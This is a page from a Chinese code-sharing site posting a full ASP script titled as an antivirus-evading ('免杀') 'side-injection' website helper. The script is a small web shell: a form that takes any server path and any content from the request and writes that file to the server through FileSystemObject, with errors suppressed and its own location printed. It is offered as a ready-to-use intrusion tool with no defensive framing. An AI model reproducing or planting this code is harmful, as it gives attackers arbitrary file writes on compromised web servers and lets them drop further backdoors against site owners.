欢迎来到代码驿站!

ASP代码

当前位置:首页 > 软件编程 > ASP代码

旁注-网站小助手旭方修改免杀asp版

时间:2020-10-29 10:59:18|栏目:ASP代码|点击:

<%@LANGUAGE="VBScript" CODEPAGE="936"%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>旁注 - 网站小助手旭方修改免杀版</title>
<style type="text/css">
<!--
.black {
    font-family: "宋体";
    font-size: 12px;
    color: #000000;
    text-decoration: none;
    line-height: 120%;}
-->
</style>
<style type="text/css">
<!--
a:link {
    font-family: "宋体";
    font-size: 12px;
    color: #00CC00;
    text-decoration: none;
}
a:visited {
    font-family: "宋体";
    font-size: 12px;
    color: #00CC00;
    text-decoration: none;
}
a:hover {
    font-family: "宋体";
    font-size: 12px;
    color: #333333;
    text-decoration: none;
}
-->
</style>
</head>
<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<p>
<% dim FSO %>
<% dim Data %>
<% dim MyFile %>
<% on error resume next %>
<% Set FSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("path1"))<>"" then %>
<% Data = request("path2") %>
<% Set MyFile=FSO.CreateTextFile(request("path1"),True) %>
<% MyFile.Write Data %>
<% if err =0 then %>
<% response.write "<font color=#FFFF00>成功啦! :)</font>" %>
<% else %>
<% response.write "<font color=#FFFF00>失败啦! :(</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% MyFile.Close %>
<% Set MyFile=Nothing %>
<% Set FSO = Nothing %>
<% Response.write "</form>" %>
</p>
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0" bordercolor="#FFFFFF">
<tr>
<td height="100%"> 
<table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="700" border="0" align="center" cellpadding="0" cellspacing="1">
<tr>
<td bgcolor="#FFFFFF"><span class="black"> 
<% Response.write "本文件在服务器上的方位:" %>
<%=server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
<br>
<% Response.write "<form action='''' method=post>" %>
</span> </td>
</tr>
<tr>
<td bgcolor="#FFFFFF"><span class="black">输入路径:<% Response.Write "<input type=text name=path1 width=200 size=81>" %>
</span></td>
</tr>
<tr>
<td bgcolor="#FFFFFF" class="black">
<% Response.write "输入内容:" %>
<% Response.write "<textarea name=path2 cols=80 rows=15 width=32></textarea>" %>
</td>
</tr>
<tr>
<td bgcolor="#FFFFFF"><div align="center"><span class="black">
<% Response.write "<input type=submit value=西天取经>" %>
</span></div></td>
</tr>
</tr>
<td bgcolor="#FFFFFF" class="black"><div align="center"></a></div></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
</table>
</body>
</html>

上一篇:好久没发布新玩意,完成了tsys的少年不在版

栏    目:ASP代码

下一篇:asp中文件与文件夹常用处理函数(文件后缀、创建文件等)

本文标题:旁注-网站小助手旭方修改免杀asp版

本文地址:http://www.codeinn.net/misctech/16882.html

推荐教程

广告投放 | 联系我们 | 版权申明

重要申明:本站所有的文章、图片、评论等,均由网友发表或上传并维护或收集自网络,属个人行为,与本站立场无关。

如果侵犯了您的权利,请与我们联系,我们将在24小时内进行处理、任何非本站因素导致的法律后果,本站均不负任何责任。

联系QQ:914707363 | 邮箱:codeinn#126.com(#换成@)

Copyright © 2020 代码驿站 版权所有